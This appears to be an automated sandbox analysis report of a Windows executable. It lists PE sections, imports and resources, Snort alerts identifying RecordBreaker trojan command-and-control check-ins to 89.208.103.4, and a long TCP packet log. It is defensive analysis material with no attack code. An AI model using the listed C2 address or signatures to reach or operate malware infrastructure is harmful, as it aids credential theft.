IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3d000	0x1028	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x18d58	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18c98	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x10c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x112b0	0x11400	False	0.6090636322463768	COM executable for DOS	6.6358418629025815	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x6dbc	0x6e00	False	0.466015625	data	5.05287754603274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0xfd3c	0xf400	False	0.6232549948770492	DOS executable (block device driver @\273\)	7.232315884354351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2a000	0x126bd	0x12800	False	0.8851879222972973	data	7.564423779432456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3d000	0x1028	0x1200	False	0.7361111111111112	data	6.2012814728171435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2a104	0x12428	data
RT_GROUP_ICON	0x3c52c	0x14	data
RT_MANIFEST	0x3c540	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, HeapSize, HeapReAlloc, CloseHandle, CreateFileW, DecodePointer

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.389.208.103.449736802036934 08/11/22-06:57:07.043612	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin	49736	80	192.168.2.3	89.208.103.4
89.208.103.4192.168.2.380497362036955 08/11/22-06:57:07.164104	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49736	89.208.103.4	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 06:57:07.005803108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.029704094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.029838085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.043612003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.066931963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164103985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164133072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164149046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164165020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164180040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164192915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.164216995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.164267063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.164273977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.185926914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.209237099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238115072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238140106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238156080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238171101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238187075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238204002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238212109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.238215923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.238251925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.238257885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.238270998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.249636889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.249660969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.249692917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.249706030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.249722004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.249738932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.249790907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.251193047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.251215935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.251231909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.251247883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.251256943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.251280069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.251316071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.262228966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.262254000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.262269020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.262279987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.262336016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.262362957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.264964104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.264991045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265006065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265021086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265063047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.265126944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.265441895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265465021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265480042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265495062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265502930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.265511036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265527010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.265553951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.265604019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.272857904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.272883892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.272938013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.272964954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.273318052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.273339033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.273354053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.273370981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.273382902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.273407936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.273457050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.274364948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274386883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274400949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274416924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274432898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.274450064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.274493933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.274892092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274909973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274925947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274940968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274955034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274962902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.274970055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.274971962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.275015116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.275026083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.285415888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285438061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285547972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.285887003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285907030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285921097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285934925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.285945892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.285990000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.286957026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.286979914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.287030935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.287075043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.288503885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288522959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288538933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288554907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288564920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.288569927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288589954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288594007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.288605928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288620949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.288630962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.288655043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.288672924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.289061069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289083958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289103985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289114952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.289119959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289133072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.289139986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289160013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.289161921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289179087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289194107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.289222956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.289242983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.290101051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.290121078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.290134907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.290178061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.290215969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.296418905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.296442986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.296458006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.296510935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.296530008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297492027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297514915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297532082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297547102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297561884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297559977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297576904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297581911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297591925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297607899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297622919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297625065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297637939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297655106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297661066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297678947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297700882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.297966957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.297985077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298001051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298017025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298021078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298032045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298041105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298048019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298063993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298079014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298082113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298098087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298139095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298489094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298508883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298522949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298537970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298544884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298553944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298569918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298576117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298587084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298602104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.298620939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.298640966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.299532890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.299555063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.299571037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.299597025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.299645901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.308979988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.309010029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.309025049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.309040070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.309048891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.309077024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.309111118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.311063051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311083078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311099052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311113119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311129093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311136961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.311144114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311158895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311167002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.311173916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311189890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.311208010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.311224937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.312643051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312660933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312685013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312699080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312709093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312712908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312724113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.312726021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312741041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312750101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.312757015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312772036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312787056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.312814951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.312853098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313709974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313733101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313747883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313764095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313776970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313779116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313795090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313797951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313811064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313826084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313842058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313843966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313857079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313860893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313872099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313885927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313886881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313903093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313911915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313919067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313935041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313939095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313950062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313962936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313966036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313981056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.313987970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.313996077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314012051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314016104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.314028025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314039946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.314043999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314059973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314074039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.314078093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.314095020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.314115047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320115089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320168972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320209980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320242882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320250988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320274115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320280075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320290089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320301056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320329905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320343018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320369959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.320384026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.320425987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321118116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321157932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321191072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321197987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321224928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321238041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321263075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321276903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321285963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321326017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321331978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321374893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321381092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321394920 CEST	80	49736	89.208.103.4	192.168.2.3
